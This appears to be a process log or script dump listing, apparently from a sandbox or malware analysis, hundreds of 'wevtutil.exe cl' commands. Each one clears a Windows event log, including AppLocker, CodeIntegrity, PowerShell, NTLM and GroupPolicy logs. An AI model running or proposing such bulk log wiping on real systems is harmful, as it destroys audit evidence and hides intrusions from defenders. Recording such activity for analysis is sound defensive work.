wevtutil.exe cl "MediaFoundationPipeline"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "MediaFoundationPlatform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IE/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEDVTOOL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-JSDumpHeap/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-PerfTrack-MSHTML/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-API-Tracing/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/General"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AltTab/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppID/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Problem-Steps-Recorder"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Telemetry"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/CaptureMonitor"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audio/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Audit/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Authentication User Interface/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-AxInstallService/Log"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Backup"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Biometrics/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BitLocker-DrivePreparationTool/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bits-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Bluetooth-MTPEnum/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCache/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheClientEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-BranchCacheSMB/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CAPI2/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CDROM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COM/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-COMRuntime/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Calculator/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Calculator/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertPoleEng/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CertificateServicesClient-CredentialRoaming/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ClearTypeTextTuner/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CmiSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CodeIntegrity/Verbose"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ComDlg32/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CorruptedFileRecovery-Server/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-CredUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Crypto-RNG/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-D3D10Level9/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DCLocator/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DNS-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DUSER/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXGI/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DXP/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DateTimeControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Deplorch/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSync/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceSync/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Informational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DeviceUx/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcp-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DhcpNap/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DhcpNap/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Dhcpv6-Client/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Disk/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Documents/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EFS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FMS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HAL/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Help/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKE/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-International/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MCT/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MUI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PeopleNearMe/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PortableDeviceStatusProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PortableDeviceSyncProvider/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerCfg/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerCpl/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerEfficiencyDiagnostics/Diagnostic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerShell/Analytic"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PowerShell/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrimaryNetworkIcon/Performance"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Admin"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-PrintService/Operational"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-Program-Compatibility-Assistant/Debug"

C:\Windows\system32\wevtutil.exe

wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"

